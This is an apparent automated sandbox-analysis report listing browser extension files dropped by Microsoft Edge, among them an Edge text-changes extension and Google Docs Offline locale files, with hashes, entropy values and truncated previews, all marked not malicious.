                                                                                                                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1328029345\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1328029345\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1328029345\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1328029345\ea2c8d60-2487-4313-bc32-9e65102e9278.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\486e75fb-d3f8-41b0-be72-c9b83549e34c.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                    MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                    SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                    SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                    SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                    MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                    SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                    SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                    SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                    Malicious:false
